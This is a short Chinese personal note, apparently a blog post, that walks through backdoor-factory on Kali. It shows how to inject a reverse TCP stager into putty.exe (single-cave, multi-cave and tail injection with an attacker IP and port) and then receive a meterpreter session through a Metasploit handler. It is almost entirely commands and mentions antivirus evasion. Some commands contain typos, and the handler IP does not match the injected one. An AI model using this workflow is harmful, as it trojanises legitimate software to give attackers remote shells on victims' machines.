【个人笔记】kali关于backdoor的使用,与问题解决

backdoor-factory

检查二进制文件是否支持代码注入

Backdoor-factory -f putty.exe -S

检查代码洞大小

Backdoor-factory -f putty.exe -S

检查哪些payload可以注入

Backdoor-factory -f putty.exe -s show

经常使用的是iat_reverse_tcp_stager_threaded这个漏洞

Backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 1.1.1.1 -P 6666

-h:本机IP地址,-p本机监听端口

会让你选择注入那个代码洞里

但是因为无pe文件,kali不能运行exe文件

需要以下操作*************************

wgtet https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

Git clone https://githbu.com/secretsquirrel/the-backdoor-factory.git

Sudo pip install capstone
下载别人写好的文件,来调用backdoor-factory
然后进入the-backdoor-factory里面
cd the-backdoor-factory

使用别人写好的python程序进行免杀

检查是否支持注入

Python backdoor.py –file=/root/putty.exe–support_check

检查代码洞大小

Python backdoor.py -f /root/putty.exe -c -l 100

查看可支持注入shellcode类型

python backdoor.py -f /root/putty.exe show

注入代码,单洞注入

Python backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.1.4 -P 4444

多洞注入

Python backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.1.4 -P 4444 -J

尾部注入

Python backdoor.py -f /root/putty.exe -s
iat_reverse_tcp_stager_threaded -H 192.168.1.4 -P 4444 -a

然后启动

Msfconsole

Use exploit/multi/handler

Set payload windows/meterpreter/reverse_tcp

Set lhost 192.168.1.1

Set lport 4444

Exploit -j -z

然后检查sessions就可以


你可能感兴趣的:(kali)